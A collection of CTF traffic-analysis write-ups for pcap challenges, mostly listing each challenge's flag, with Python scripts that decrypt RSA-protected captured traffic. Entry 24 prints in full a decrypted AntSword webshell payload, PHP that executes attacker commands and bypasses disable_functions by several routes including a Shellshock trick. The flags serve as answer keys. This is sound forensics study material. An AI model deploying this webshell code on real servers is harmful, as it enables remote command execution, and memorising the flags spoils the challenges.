21.root
root.pcapng
flag:when_solving_problems_dig_at_the_roots_instead_of_just_hacking_at_the_leaves
22.说我作弊需要证据
cheat.pcapng
题目来源: ISCC-2017
题目描述:X老师怀疑一些调皮的学生在一次自动化计算机测试中作弊,他使用抓包工具捕获到了Alice和Bob的通信流量。狡猾的Alice和Bob同学好像使用某些加密方式隐藏通信内容,使得X老师无法破解它,也许你有办法帮助X老师。X老师知道Alice的RSA密钥为(n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13),Bob的RSA密钥为(n, e) = (0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)。
import base64
from libnum import *
# Base64-encoded payloads taken from the capture. The write-up elides the
# actual list, so it must be filled in before this script can run.
c_lits=[……]

# Key material for 192.168.0.13 (Alice in the task description).
# Both moduli in the task are only 28 hex digits (roughly 112 bits), which is
# small enough to factor; the factors are kept in the comments and the private
# exponent is presumably derived from them.
n1 = 1696206139052948924304948333474767
e1 = 65537
# p1 = 38456719616722997
# q1 = 44106885765559411
d1 = 37191940763524230367308693117833

# Key material for 192.168.0.37 (Bob in the task description).
n2 = 3104649130901425335933838103517383
e2 = 65537
# p2 = 49662237675630289
# q2 = 62515288803124247
d2 = 1427000713644866747260499795119265

# One accumulator per traffic direction.
flag_1 = b""
flag_2 = b""

for packet in c_lits:
    fields = base64.b64decode(packet).decode().split("L; SIG = ")
    # SIG field (hex). The trailing "L;" is removed before parsing.
    m = int(fields[1].replace("L;", ""), 16)
    # DATA field (hex): the RSA-encrypted value.
    c = int(fields[0].split("DATA = ")[1], 16)

    # Case 1: SIG opened with the .13 public key, DATA decrypted with the .37
    # private key. Only packets where both results agree are kept, which
    # filters out the decoy packets in the capture.
    m_ = pow(m, e1, n1)
    c_ = pow(c, d2, n2)
    if m_ == c_:
        flag_1 += n2s(m_)
        print("第一种", m_)

    # Case 2: the opposite direction (SIG under the .37 public key, DATA
    # under the .13 private key).
    m_ = pow(m, e2, n2)
    c_ = pow(c, d1, n1)
    if m_ == c_:
        flag_2 += n2s(m_)
        print("第二种", m_)

print(flag_1)
print(flag_2)
t3_01ftmg_n}h3hl3_n530rn0{g3a0_v_
修复顺序:flag{n0th1ng_t0_533_h3r3_m0v3_0n}
23.traffic
http.pcapng
第一个flag
flag{fakeflag2333333333333}
第二个flag
flag{zhehaishiyigejiade_flag}
第三个flag
flag{ne7WORK_traffIc_i5_int3r3sing_1433223}
24.AWDshell中国蚁剑rsa aes流量
AWDshell.pcapng
import rsa
import base64
from LazyMyRSA import *
# Base64 RSA public key used for this capture. The "MIGfMA0GCSqGSIb3DQEB..."
# prefix and "IDAQAB" suffix are the usual shape of a DER-encoded 1024-bit RSA
# SubjectPublicKeyInfo with e = 65537.
# NOTE(review): where the key was recovered from is not stated here (presumably
# the webshell file or the capture itself); confirm.
# The loop further down decrypts the request body with this *public* key, so
# the sender must hold the private half. For a responder this means the
# command traffic is readable by anyone who obtains the key stored on the
# server side.
# NOTE(review): Pub_Key is not referenced again in the visible lines;
# presumably LazyMyRSA is configured with it elsewhere. Confirm.
Pub_Key='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCmXoXBvXeanxgl51HBm2J6HPNhTQtfb8ICioE+n0Ni0DlBFHSBprbsWYKJywVfdhJbLDCCon68uA1UYuy0yteDog3jOdweW2bscEGmeMXLQJfBHpQrg4wWoYJjD3QsKorYT6kdp1LRkuHE3PbpqvRtqO7ALzrcBi88Eu7oZaPANwIDAQAB'
c = "GmFJzJHcsMOZxeGvb3Ulf4Y8e5RRhttAV1bsfypbvQAJW8IRFcqDVoXtyiclZwz2qXdQN8ivFYNqNxhkwtjbB7OitVLgULBfWlOnwtufxvmbmO4u8WlINbPbf/DbAy0Qx3GjBMFpFzrCkKINOfWQ5JqSD1EPx6sM9Cu1VkX5nus=|nL6Ds9dWn+UW5Jb0JAhoTb4rqPJJKbgcPNJfXLP1AKPbWHVE0JFSjClsnXWmFPXfeqPdKqcYxb/14hEwFzs51N5f6+NowrGHjYT+ObPKXpYxzg0vkCMihUMA7DI2YPUWEyPdvoIFg/bW5S3MommwKN9epOto55dtq6Pnb8NEHzY=|S4ic8EaKa3zEkRd7qsTGDs7uf3qiU1UVZE4fheQz3iq1HkiY6rIvAdtvcmsBF5aJWjdA/U2py1Mz105F2Tzm4dDX2Ag/rhX4ysiP8NJDEp+I55R0dfJu6szTOr3O2OTaUQK7iSYT4PKHjdo+rgeHK3hWzzMFAs6i2R9E81vz9WE=|FNCwxF7bDPNgizk4oa7bq4xbIObNCZNYNBdrTLMbYegWZ6FVYi54TLuABR/nkDLXq38cT099hjajM4iY+VL4g8tBRP++4LyPcSyzyC6mDtshAlmQtFteq4sGb+3IilDPekURxQ5RodRGBPtHr+nCNICbgmbqNaYKcVJRfMoK3q8=|m+nGWL1bOFJzaYeT54FtW12U3dWPZk5PJa91+YTtLn9Wg1c8JEf0FzI+YlBtpp6pW0fT7FfbTiJhQsv3f97bb3d+Cs7A5dM/ZG5YXDoDHGhRJKw0+TTHRIm3PH4fnbQNI8zhi5+9t2+0ueujAuXkk8i73A4lH36uKJFloL6yqs8=|YsyuPkbRlpDWwjhlkTThQN9GQXGkkzyNSFoxs5IfsRbbO7ZHphlFhL4yYsRYAgp8MkMJ64x7NfIGoVgDJnA1YgORiJOf8GP/p/28MLOuscy1SVN/lLnJzbhmf/7vfg0/Q94QAEWk2TOgSil0h3JDsgQYqDtFFldHWDnqEvYlWZI=|C2ZaL3MQWCQBmNcq8xAxxlhvXzUxo0qBz2PUIqBIMcKNJ3sgxU+RTqSwYoqPTDAg3//7rNa+dkinRAidD8GjrcSBd5qdbTLQlWZGME9Lv6JEFt0udTU0FVrhV/ctPz+z1NN5P4pN1tj35sNKsyfYH1kq13A+3dYk0wZlMU9KIFI=|l65yWzb3A97Cdu0wdn59Hiag/Um4/LZTrolCjwo9d7/J3Z9stTkaEtLe2XBdVQZsipUfnW2o7JWgQNo0TUbGWIv2H5wKGaTfPm7OTSkm+ao48Nn1d/+yME+RLudQqbmYREMAJFviNJST+H4Q+MqyngjMeGrb5jmlw0eQZ/MUx5Q=|EYwu5Y3rgl8k2KrPZjnGPWjriLI1mDeJwA4KhjvJ4wQs9Xx+ITDsxBr0eMfL/Km95ykbfMlZcrSzonx5hLiE2YLwDjX/cIIZxqzZXkEYq00AdAPrFnhFVdvJn/SHQ1LdGHgAN88Y2EOZOPM8ZXima61BxCY44TlrezIbBj4+eQ0=|Z2/dEUju0jw63PMHCK9CAG+tHmwiH0t3GraGPCes4TZT5hIfv6kHMTOgMthTK6sd5qy+EVw6d1Qxh03WMHVH0gR2aYqEl1RdYwQpN0NPsSM+fETsag3nQ4oV3VniGlaMmdFIiYatNvKNl7tOcapklyxEEIA0Jc33O7FDjUXKiHU=|YEVG5OctKJXP1Z7kywDJGrmb7BvXW/C3iQudtTCLgUIbMhXFq90wLvW7No7ZoqhY/Mh1XlJKtkBZJWEbsORW23hxvA5LCb/edsfJmIxWtj5cRG9g66j3BiEUPDjvtYi6beUjUtKmuSInELTkmIKf1jo5qyZE+VcWC4HfAT0wbFw=|ii/O42J/+ko4xPNfNuunKR7gyji/wtaiMcKMzQM2Qg7KZE/+xAcLX3Znh55OwgsfaTX6AedF+L/1hwMp9zigbvXorSE0
TNay//nVlcnhhC4snAu2/hjXNoI3OnnWlfFFLYOj5v+1LN1nCU/UzoHV6/w1/4bVz7Maovj14BfXklI=|eay1qqOy5QmJmStB9EH4JKPms1In5agVigegn5/1IZS+0QpBgK37mWg02rspbMz20brtSgsv2PhJ3gMTFg3ib7z0cQZPvcNV6DTZwSHbUO2M1uQetssYMMnBPPulwLhTkND4SzwSsgDLS6m8TxbHL0qpZRcnNo2sMy478S5DkvM=|e4qLRtta2W6ItXy3HNgpYuQuSSzpsvq+SUfoRKWM8Z5QdiBeleS/YDGP0VZqRJh3CPMC6vbegwB7qNLAt6czTsHQTdTAJBLr5g4oTDc9Sxlk8A7vvK0ljLSgKjNw5s3BDa03jINPkc5BbDkrTaXMq01Bqcu5DPTTA0pO/Z9oq1Q=|RBdZrEGknOK+PCuQ1F2eTxKvAi50XD/Z1ccAItPJ+48VlSbOTZa/wkdr82K8LE56z0E4JtZDBVSj9I4TurU2bbmfCjKXGw9xlagS7YMr/hfyCy/2hrVveAkaBZDAtmnrM4nGpFxVpzArl124XlqEzh9cSS9LAnwkNm8j05D6mDc=|aZpV5K4m1Rwxd/Y9eOfJ0bRpIZybj2tSjuAEJI7Il/EV9ZC0pXLIkgWviG40pXQFGoEwGex7f0j/Je4ldLRKnrpsyZ+/3mZtHnHL4gepf+iVaULQ8jdHTVVnM1t4qLJk+RnhYbuFjcUy5Yo6rn0Cju8sPIdpEwvi8fvetIOGVJE=|fPGROe6VaAwzqmNuk86fnWT4LqandXTwuewTC80zI8xTFSj1S6YMxPROTHS94gXlCcLTfFjEW2VpH2tyANX1FBIw5sSjsuS6CQKuqiQo6ID975H5Ox+KkJs6XLP/l5Or34U3rryHzBooTrXQlDl21qoPBLdj5URgGrEq7wrvLVA=|jp3lUm3Gz2eZpB5zghEGom2syK8nBymkc6h3pKE/mIS8KW6gD2OFSEneFERI0jy26kVOBhxr3ZHY3WoL6s5aJepTuY7D6Dpz/REI+FzR2PlCo0WvyLQdOphMgbYef1SyYr1+DWK/JxxFjxtfVRZlwL7+OyHQjQ05oVHyq6juSEI=|h8tsCCKgjChZ5U/sZxeVPiF8hO+cB6qqfeWnTAMydEcLmR0iwvHcarZw4g2WH2ASvwIN0av4GzLSu2QtOM1u0y/OuVX3v9/Vp+nNMZ/Dog0NUxFIPD1HTgaK3w7DdnA6B6i26JooWAxKlTFgYmr0x7K53pmM6B8wVQu/ADsbFBE=|CdejrTSVZhSgL+3bhPQyuL7ho71i+L8VvpwNg+D84YnKdwbbbfgqIMu+gefCBmyzvhbhEeGR16/T/fZ4bkneak+fzZpgUrejrFbOETG2Rg9zViznPwBdku9FTlWUybaRD0CHKeY7nE93/G2yXWSpuk/7P594cAPi1qd2WnEbaBc=|Hnxjy7ZSfmn6B59Kv7VXu1mhtYdgGbOtsLsLqDX6K1dKhtHsGx0guy03qwqRA0XElDdJ3Dvgqi5lgb8SY6MiDf1c9u870K8S9xVTn6Y0lbZgtvPoDrobEiT6tGEQCRsUuXB6jbUTgnNPmaDAuidQZqdsSBIGZwQyzycgxHmaDuE=|Imz1om4RRCU1Wnyowe5SYFtICyD1BODveyZ497yURKcyMgoogUxi0cPCiyexdD9ciNYk6DGyimegT7zMeIA5oGfNg2EHbzuBJeSc4wqLCJtSmTe66inu3dqC4IDxt2ghkgFLSQZWqNOKOgUt1b5wgy3O/Y3iIzS888TuFSDm+RQ=|jldlrb8EHvWiKi5E/HBIrn4UUnzMZO8+6ugZ7hjZTtWI5Vg9EeWdmITpEpOQIWIXpOUhaI+VydVcom8e7Fe6gR6u4RPy5ChmFgjZhT03gwwNXzJeiaE6x7ZZjXGBZA3Lwu5gRns3s+hTM0Tm2vrhGOQDB41hDDi4N/Yb3MRn0PM=|UJKgd4FCzzzMeQEq
+w3S17+3d+g9mM3JM2qZWkWHOIF3L/EiWpRhm18DuaWJ7veqQSA5pb3KGH9rKDvj2KHIDTUHl0gCiH1U5qeD+WqXFvLahN5O8ecrfgflUUip1SdE6aL6dYqzyplxF+qy3BVr2dKq+6UYlUiA5Bmn2lXSIyM=|LClEAJBfCO7HMhlu0ASDbetkR7sP4aOx9a/P4P0L5kLeGYrlrK4Qg3ZNl7Fd/gQ8KXAKs90XRE62pfZidMX1A4xj/IokC6nkXCNUIzi0PWPWdCzcBNiswbQtsTZhElecl8RyfaOSvxsiKclTvKbZYfQI5r0p0asBs5gKnK0FpT4=|paMu+DWwNp+5GRSiGn4QfFaS/ffXXKuBgP/qzsixnnBWMeXIVy/HT23Xdoc7/OdlIH8/rBKdrJt+7o6XUAbRGzND9sEuf0Ldh5npWln/EhSkGq+bqt1hDfmwwsoo2GJcNDHBhz6lQq2M4zoa9E9d04T3N/SE+3B7LFb0cxLE8aA=|Cz+hQca9uYZJPPJusvE1G8X12VF5iPFM83nOnszF38XQziVKd+D83N4IvoJPNdJLEtgbycIpg1bo5auK1u9n2Pv8z1jFHoaTzmPgDBFiAAv3NGd0m2vg09QwRxq84PD9Ey0dwT7C1w2e6M9wGJ6DoIhPhZQgvUKMyrmCAVmMo18=|h59BqEgdFq4a1HegvdVKeMWwiwQMQsaSzYOxbNCiPuCRGknF8dHHkQboB65gnjbNBDPVpiVoDBMDV+1sCc1yM8zqC494bDS7iopf/U3BBnZS2wCxeo1x78DUiEgzP6ILomxrhrMY2y5R9IbmhJQVkpiqMhPaCvvHzOZO6Pz9SHg=|gUSFO4uVnPAI4UVTKCdBqH/rD6BZZFPfhsVOzga0ohjOJhXW+pvAu4GSh+3FIGn6cpxBUILbsLjBSgmscqAbKV/nHRnQ8HjQUgnu5YM8KikKJV35OMt1Mo1P/qlF5bwzI969XDtUHtClPkznXuO4HyvGLj0/mJj0IauhxfDKhyU=|jkhijGHqR86l+YGh7fldHrzLfam9LUYfRt2nrqqgeqCoE6KO8khatGkzLPk8QgIjLti6P6d7AwwPdVLX3gsfv6bBhT26qUR1u5+AA8foNt5tH6Ej33OODcnkxcp19eFu+zWRG1zUDkBs5qtCJvZKnpSPFKxJ6Z2g0RAoKF3pqbY=|QayQ2dVrEz8KBgpVQjGRNbpRHgFhVK3e89fEzEKzlclezrZ7CBgjB6/Y0PPYSIeZldFEZficAzHXs+bFHALEMrkJlRMk36FMuqtn0YVs4cVy8AHxjb8QnJD9gsFC6q2EWmRo8w4ZdBvg1xyeg3D0vhOcZgNk78BGoSU2HhHK5xY=|Ncgk0CAlnik6xDFINohB1EqgT7tS8COpia8O9cuvi53lNlQWY4IWG2oZMgzNWeU/m8QL+EGqhrD6IflJDD/hDO/IFC6D2DEjeMofqJ/6sHXAt2lIV129SeUUjGdrxyxeWDtqu6iBDdDBtyfPVfeI/DMYOh46XkR0Wk5nBU2N7+U=|lOxi5A2Z8sa8+aw5rQm0g6gqukXMlwvLV7ykEiGWFRqFqDaRPnkVI8diKsvgBg0Btk94gXt2FX1polSNgIJL3E6GW9loo2OMSGBBg1KJ/6VC/DpLWy44VbZhrUB//hiXo3xua6h2DRDi4h5eFkkf2ZIjGjZBi+AqHQINUbetN54=|DRBn6EF3Eoj+wpOX2xhKhkrypPB+d2+8PyHzXwKL8QmOeaRufeCZ1/7Id4TQPXiRXOYsPDXVLr1tUWAUNfqIQisGxSL8lAgg9LzYNYxRUejuTsP2WmVSO21cYXTPlNYjJDR+BkTtOlAvBBp3fjwhOVlr1khuzAhl2Y799drdSFk=|VIJ6dfEfxNcc1eWhAL0dMWXkGSCnBqv+I+Hqs7mGdK9CG3sMH1LyhIEsYg/UPccftYAPeIqKitOpj4OlNbGQMlf8AIJgFvNceAl7HCwqf/6ggZzfc
Bx5r4HpCBI3cB2zOOOlX9AFVRcunk3rCZSsaeQ8QGsLC1q/2EImzQqSB5g="
# The captured request body is a '|'-separated series of base64 segments.
# Each segment looks like one RSA block and is decrypted on its own.
c = c.split("|")
for segment in c:
    # "Public-key decryption": the block is opened with the public key.
    plain = PubKey_Decrypt(segment).decrypt()
    print(plain)
/*
 * Decrypted request body recovered from the capture (the output printed by the
 * script above). The listing is kept exactly as extracted; line wrapping has
 * split some tokens (for example "sessio n_start"), so it is not valid PHP as shown.
 *
 * What the visible code does:
 *  - Base64-decodes three POST fields (t185a78b977a47 -> $p, wd0b7c7ca226cb -> $s,
 *    b8dcb72ce2ba93 -> $envstr), builds "{$p} {$c}" and passes it to runcmd().
 *  - fe() reports whether a function exists, is callable and is not listed in
 *    disable_functions. runcmd() walks through system, passthru, shell_exec,
 *    exec, popen, proc_open and antsystem, then runshellshock(), then a COM
 *    WScript.shell object when the script path does not start with "/".
 *  - asoutput() echoes the buffered output between the markers "f3c7239848e0"
 *    and "05fda2646c". asenc() base64-encodes that output, encrypts it with
 *    AES-128-ECB and base64-encodes the result. The key is the first 16
 *    characters of session_id(), padded with 'a'.
 *
 * Notes for the analyst:
 *  - The response key depends only on the PHP session id, so a responder who
 *    has the session id from the same HTTP exchange can decrypt the response
 *    body offline.
 *  - The marker strings and POST field names are useful search pivots inside
 *    this capture. NOTE(review): they look generated, so do not assume the
 *    same values appear in other sessions.
 *  - Because runcmd() falls through a whole list of execution primitives, a
 *    disable_functions list that blocks only some of them does not stop it.
 */
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@sessio n_start();$key=@substr(str_pad(session_id(),16,'a'),0,16);return @base64_encode (openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));} ;;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f3c7239848e0";echo @asenc($output);echo "05fda2646c";}ob_start();try{$p=base64_decode($_P OST["t185a78b977a47"]);$s=base64_decode($_POST["wd0b7c7ca226cb"]);$envstr=@base 64_decode($_POST["b8dcb72ce2ba93"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c= substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv ("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sb in:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows /SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty( $envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if ( !empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";fun ction fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=arr ay();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exi sts($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {i f (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp _dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) { error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return Fa lse;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print ($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_ SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passth ru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}else if(fe('exec')){@exec($c,$o,$ret);print(join(" ",$o));}elseif(fe('popen')){$fp=@ 
popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif( fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array( 'pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@f eof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_ close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c) ) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM( 'WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e-> StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret= @runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
flag{62a8bd78d8fb5a04dab1579b484d9a88}
25.all
all.pcap
修复头部
26.upload
upload.pcapng
flag{te11_me_y0u_like_it}
27.telnet协议+aes加密
++__++.pcap
WDCTF{Seclab_CTF_2017}
28.hack
hack(5个flag).pcapng
HTTP流92
flag{d41d8cd98f00b204e9800998ecf8427e}
TCP流103
flag{bb9c019d6524e913fd72441d58b68216}
TCP流105
flag{c43064699caf6109f4b3da0405c06ebb}
TCP流111
flag{f0b6f6352bf886623adc04183120f83b}
29.backdoor++
backdoor++.pcap
flag{Icmp_backdoor_can_transfer-some_infomation}
30.brust
brust.pcapng
swings666
31.findwebshell
findwebshell.pcapng
访问http://cff2016.oss-cn-shanghai.aliyuncs.com/AbTzA2YteFjGhPWCftraouVD3B684a9A.jpg,出现一个二维码,扫进去得到flag。
32.flows
flows.pcap
存在两个文件,导出
0000000000000000替换掉,0100000000000000替换成0,02000000000000替换成1
flag{u5b_keybo4rd_m0use}
33.guess
guess.pcapng
NCTF{dbb2ef54afc2877ed9973780606a3c8b}
34.hack
hack.pcap
flag{skysql_is_very_cool!233}
35.kill
kill.pcapng
flag{roses_r_blue_violets_r_r3d_mayb3_harambae_is_not_kill}
36.learn_100
要想会,先学会.pcapng
第三届“百越杯”福建省高校网络空间安全大赛
flag{Na1v3}
37.misc
misc.pcapng
flag{Rgb_dhskjadyhjksndjsagh}
38.packages
packages.pcapng
Flag{900b217f94b0cec1f0ee6687914aadda}
39.secret_200
password.pcapng
I春秋“迎圣诞,拿大奖”活动赛题
flag{C0nGr4t5_H4ck3r_Y0u_Ge7_Secr3t:)}
40.shell
shell.pcap
flag{U_f1nd_Me!}